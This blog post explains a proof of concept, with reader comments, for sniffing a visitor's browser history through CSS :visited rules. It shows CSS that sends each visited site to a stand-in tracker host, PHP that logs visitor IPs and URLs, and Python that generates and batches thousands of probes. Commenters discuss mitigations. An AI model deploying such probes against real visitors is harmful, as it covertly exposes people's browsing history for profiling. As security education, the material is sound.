Sniffing Browser History with CSS

Have a look at this page: http://making-the-web.com/misc/sites-you-visit/nojs/. It will fairly quickly and effectively generate a list of sites that you have visited.

This proof of concept demonstrates how basic logic in CSS (Cascading Style Sheets) can be used to query a browser as to whether a visitor has visited another web page. More generally, it shows that even simple logic in a technology can be exploited. Although the data used in this example seems rather unimportant, once it is used to profile a user’s likes and dislikes, for example, it quickly turns from “data” into personal information.

The CSS Logic

Fundamentally, this PoC relies on pure CSS. Take, for example, the following CSS…

#link1 {
	color: blue;
}
#link1:visited {
	color: red;
}

…applied to this:

<a id="link1" href="http://google.com/">Visit Google!</a>

From the above, you can deduce that “Visit Google!” will show up blue, by default; the exception to this is when the visitor has visited http://google.com/: the link will show up red. Seems innocent enough, right?

Consider, instead, this:

#link1 {
	color: blue;
}
#link1:visited {
	color: red;
	background: url(http://trackersite.ext/track.php?url=google.com);
}

…applied to this:

<a id="link1" href="http://google.com/">Visit Google!</a>

As before, the link will show up blue by default. If the user has visited http://google.com/, it will show up red. However, it also displays a background image for the link. Obviously, to get the background image, the browser has to request it from the server — in doing this, it innocently sends additional information along with the request: ?url=google.com.
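To make the leak concrete, here is a minimal Python sketch of what the receiving server can read out of that request. The function name leaked_site is hypothetical and not part of the original demo; the URL is the one from the CSS above.

```python
from typing import Optional
from urllib.parse import urlsplit, parse_qs


def leaked_site(request_url: str) -> Optional[str]:
    """Return the value of the `url` query parameter, or None if it is absent."""
    query = parse_qs(urlsplit(request_url).query)
    values = query.get("url")
    return values[0] if values else None


# The browser only requests this URL if the link matched :visited.
print(leaked_site("http://trackersite.ext/track.php?url=google.com"))  # prints: google.com
```

The mere arrival of the request is the signal: the server never sees the browser history itself, only which background images were fetched.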

The Server Side Code

You have probably noticed that the background image doesn’t go to an actual image: .png, .gif, etc. Instead, it loads a PHP script. This script has the potential to log the sites a user has visited. Consider the following PHP:

<?php
/* ... */
$ip = $_SERVER["REMOTE_ADDR"]; // the user's IP address
$url = isset($_GET["url"]) ? $_GET["url"] : ""; // the URL they have visited

// log the information in the database table
// (assumption: $pdo is a PDO connection opened in the elided code above;
// the old mysql_* functions no longer exist in PHP 7 and later)
$stmt = $pdo->prepare("INSERT INTO trackdb.log (ip, url) VALUES (?, ?)");
$stmt->execute(array($ip, $url));
?>
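For readers who want to try the logging step without a PHP and MySQL setup, the same idea can be sketched in Python with the standard sqlite3 module. This is only an illustration under stated assumptions: the table layout mirrors the ip and url columns above, while the open_log and log_visit helpers and the in-memory database are hypothetical choices, not the original demo's code.

```python
import sqlite3


def open_log(path: str = ":memory:") -> sqlite3.Connection:
    """Open (or create) a log database with the two columns used above."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE IF NOT EXISTS log (ip TEXT, url TEXT)")
    return conn


def log_visit(conn: sqlite3.Connection, ip: str, url: str) -> None:
    """Record one detected visit; placeholders leave quoting to the driver."""
    conn.execute("INSERT INTO log (ip, url) VALUES (?, ?)", (ip, url))
    conn.commit()


conn = open_log()
log_visit(conn, "203.0.113.7", "google.com")            # example IP from a documentation range
log_visit(conn, "203.0.113.7", "it's-quoted.example")   # a quote in the value is stored safely
print(conn.execute("SELECT ip, url FROM log").fetchall())
```

Using placeholders rather than string concatenation matters here because the url value comes straight from the request and is fully attacker-controlled.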

Querying the browser…

Now that we know how to query the browser for one link, we can do it for many links:

#link1:visited {
	background: url(http://trackersite.ext/track.php?url=google.com);
}
#link2:visited {
	background: url(http://trackersite.ext/track.php?url=yahoo.com);
}
#link3:visited {
	background: url(http://trackersite.ext/track.php?url=amazon.com);
}
#link4:visited {
	background: url(http://trackersite.ext/track.php?url=php.net);
}
/* etc */

…applied to this:

<a id="link1" href="http://google.com/">a</a>
<a id="link2" href="http://yahoo.com/">a</a>
<a id="link3" href="http://amazon.com/">a</a>
<a id="link4" href="http://php.net/">a</a>
<!-- etc -->

And it’s that easy! Just put thousands of links in, and you have the ability to find hundreds of pages that a user has visited.
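Nobody would write thousands of such rules by hand. A minimal sketch of generating them, assuming the list of sites is already available as plain host names: build_probe is a hypothetical helper, and the tracker URL is the one used in the examples above.

```python
from html import escape
from urllib.parse import quote

TRACKER = "http://trackersite.ext/track.php"  # tracker URL from the examples above


def build_probe(sites):
    """Return (css, markup) with one :visited rule and one anchor per site."""
    rules, anchors = [], []
    for i, site in enumerate(sites, start=1):
        rules.append(
            f"#link{i}:visited {{\n"
            f"\tbackground: url({TRACKER}?url={quote(site, safe='')});\n"
            f"}}"
        )
        anchors.append(
            f'<a id="link{i}" href="http://{escape(site, quote=True)}/">a</a>'
        )
    return "\n".join(rules), "\n".join(anchors)


css, markup = build_probe(["google.com", "yahoo.com", "amazon.com", "php.net"])
print(css)
print(markup)
```

The ids only need to be unique within one page, so a running counter is enough.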

How the PoC works

The PoC fundamentally works as above. In order to check thousands of links, it uses publicly available data from Alexa and the Yahoo! API.

Firstly, it scans for website homepages, as provided by Alexa: http://google.com/, http://yahoo.com/, http://msn.com/, etc. Each visit it detects is logged on the server.

Secondly, it scans for individual site pages, such as http://google.com/cookies.html, http://google.com/adsense/, http://yahoo.com/uk/, etc. It will only scan a site’s pages if the site’s homepage was visited (ie, http://google.com/cookies.html will not be queried if http://google.com/ was not visited). To get the list of a site’s pages, it simply does a site:domain.ext query via the Yahoo! API.
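The two-pass selection can be sketched as follows. This is an illustration only: pages_by_site is a hypothetical stand-in for the results of the site:domain.ext queries, and second_pass_targets is not a function from the original demo.

```python
def second_pass_targets(visited_homepages, pages_by_site):
    """Return the individual pages to probe, limited to sites whose
    homepage was detected as visited in the first pass."""
    targets = []
    for homepage in visited_homepages:
        targets.extend(pages_by_site.get(homepage, []))
    return targets


# Hypothetical lookup table, using the example URLs from the text above.
pages_by_site = {
    "http://google.com/": [
        "http://google.com/cookies.html",
        "http://google.com/adsense/",
    ],
    "http://yahoo.com/": ["http://yahoo.com/uk/"],
}

# Only google.com was detected in the first pass, so yahoo.com pages are skipped.
print(second_pass_targets(["http://google.com/"], pages_by_site))
```

Pruning by homepage keeps the second pass small: pages of sites the visitor never opened are not queried at all.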

Because it can detect 40 million pages, theoretically, it performs querying in “batch mode”: it might check 2,000 pages, and then use a META refresh to scan the next 2,000, and so on.
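A rough sketch of such batching, under assumptions: the batch size of 2,000 comes from the text, while the ?batch= query parameter, the one-second delay and both helper names are hypothetical.

```python
def batches(urls, size=2000):
    """Yield consecutive slices of `urls`, each at most `size` items long."""
    for start in range(0, len(urls), size):
        yield urls[start:start + size]


def batch_page(batch_index, total_batches, body):
    """Wrap one batch in a page that META-refreshes to the next batch, if any."""
    refresh = ""
    if batch_index + 1 < total_batches:
        # Assumption: the next batch is addressed with a ?batch=N parameter.
        refresh = (
            f'<meta http-equiv="refresh" '
            f'content="1; url=?batch={batch_index + 1}">'
        )
    return f"<html><head>{refresh}</head><body>{body}</body></html>"


urls = [f"http://site{i}.example/" for i in range(4500)]
chunks = list(batches(urls))
print([len(chunk) for chunk in chunks])   # sizes of the three batches
print(batch_page(0, len(chunks), "..."))  # the first page points at batch 1
```

The last page carries no refresh tag, so the scan stops on its own once every batch has been served.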

The PoC demonstrates this functionality using pure CSS and HTML. It could also use AJAX with JavaScript to load the lists, rather than using iframes and refreshes.

The Implications

This exploit currently has the potential to be used to track website visitors’ likes and dislikes. This could in turn be used to display advertisements targeted at the user. For example, if you know a user has been visiting car-related web pages, you could display an advert for cars, which is likely to get a higher CTR (click-through rate) than an advert for gardening equipment (unless they also visited gardening-related sites).
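How little it takes to turn a list of detected sites into an interest profile can be shown with a toy sketch. Everything in it is hypothetical: the site names, the category table and the top_interest helper are made up for illustration and do not come from the demo.

```python
from collections import Counter

# Hypothetical mapping from detected sites to interest categories.
CATEGORY_BY_SITE = {
    "cars.example": "cars",
    "autos.example": "cars",
    "garden.example": "gardening",
}


def top_interest(visited_sites):
    """Return the most frequent category among the visited sites, or None."""
    counts = Counter(
        CATEGORY_BY_SITE[site]
        for site in visited_sites
        if site in CATEGORY_BY_SITE
    )
    return counts.most_common(1)[0][0] if counts else None


print(top_interest(["cars.example", "autos.example", "garden.example"]))  # prints: cars
```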

Naturally, many people will consider this information personal when used in this way, and will be concerned about how the data is, and could be, used. Browsers and plugins are likely to reduce the effect of this exploit. (Firefox will be coming with an option to disable the :visited selector.)


Comments

  1. On July 10, 2009 Mike says:

    The question I have is what can be done to stop it ?

  2. On July 21, 2009 Dman says:

    How do you integrate Alexa data with the Yahoo API? It would be nice to see how you manage this.

  3. On July 22, 2009 Brendon says:

    The data isn’t “integrated”. The site asks Alexa for the 20,000 most popular websites, and then goes and asks Yahoo! for the 1,000 most popular pages on each of those websites (up to 20,000,000 pages).

    Does that explain it?

    Thanks,
    Brendon.

  4. On July 29, 2009 Ricardo says:

    Genius! Evil but…

  5. [...] of the site infinity-infinity.com has put his finger on a rather impressive CSS flaw. Here we will look at the technique [...]

  6. On September 14, 2009 Teng says:

    Followed the link and all I see is an empty wordpress blog, has this been taken down already?

  7. On September 14, 2009 Brendon says:

    @Teng, I sold Making the Web a few weeks back, along with the rights to the demo. I expected the site to be put back up, but for some reason he has chosen to do nothing with it. Unfortunately, it is out of my hands and you will have to contact the new owner with enquiries.

    Thanks,
    Brendon.

  8. On October 11, 2009 Neddy says:

    Interesting idea! Would it be possible to make a JavaScript that loads links via AJAX and then generates the individual classes for each link?

  9. On October 11, 2009 Brendon says:

    @Neddy,

    Yes, it would be possible. In fact, the first version of the demonstration used JavaScript (rather than use different classes, it just accessed the style attribute of the element to determine its colour, and hence whether it had been visited). I only changed it to iframes because so many (naive) people complained that it didn’t work and that NoScript protected them.

    -Brendon.

  10. On October 21, 2009 David says:

    Hello, Brendon.

    Thank you for your useful articles.

    For the benefit of anyone who is considering visiting the Making the Web WordPress Web log, the site (as of today, Wednesday, 21 October 2009) remains a blank template.

    On a related note, the Web site What the Internet Knows about You provides tools and information about history detection techniques and tips for mitigating risks. (Disclaimer: I have no affiliation with the site, which I just found today, nor can I attest to its accuracy or lack thereof.)

    The solutions page includes tips that will NOT protect you, including disabling JavaScript (and Brendon makes it clear that the detection mechanism requires no scripting and uses CSS); using the Firefox NoScript plug-in (because cascading style sheets detect browsing history, but are not scripts); disabling Java or Flash (which are not involved in the techniques used for history detection); and deleting cookies (which are not used in this CSS-driven browser history technique).

    The site offers three steps for protection from CSS-driven browser history detection: "In general, there are three possible ways of protecting your browsing history from being detected. While all of them have their own flaws, we present all the solutions we’re aware of to give you a choice of what to do. "

    The steps are disabling your browser’s history (by setting your browser not to retain browsing history and installing certain Firefox extensions); disabling CSS styling of visited links (providing the ‘about:config’ solution for Firefox and a custom style sheet for other browsers, which should be tested); and using a special browser extension to fix the problem (with suggested extensions and plug-ins for Firefox).

    Obviously, no panacea for this vulnerability exists. Combining protective measures can cause conflicts and performance problems, and customizing CSS settings can cause your browser to render a given Web page in an unpleasant or useless manner.

    Cordially,

    David

  11. On October 22, 2009 Brendon says:

    @David, Thank you for your comment; to think it was almost lost to Akismet as spam…

    ‘What the Internet Knows about You’ is a good site which demonstrates this exploit nicely. I second the suggestion to delete history if you do not want it detected.

    Thanks,
    Brendon.

  12. On November 13, 2009 Al says:

    is it possible for windows users to edit their HOST file?

    for the example above, adding a line like this in the HOST file

    127.0.0.1 trackersite.ext

  13. On November 22, 2009 Des attaques en CSS ! says:

    [...] subsequently, the flaw was extended somewhat with a few good ideas contributed in mid-2009, notably the exclusive use of CSS and the use [...]

  14. On February 12, 2010 Partyurlaub Zrce says:

    Is there a solution to stop it, so that no one can do this on my system?

  15. On April 03, 2010 Mehmet ALP says:

    Great code! Thank you for sniffing browser document.
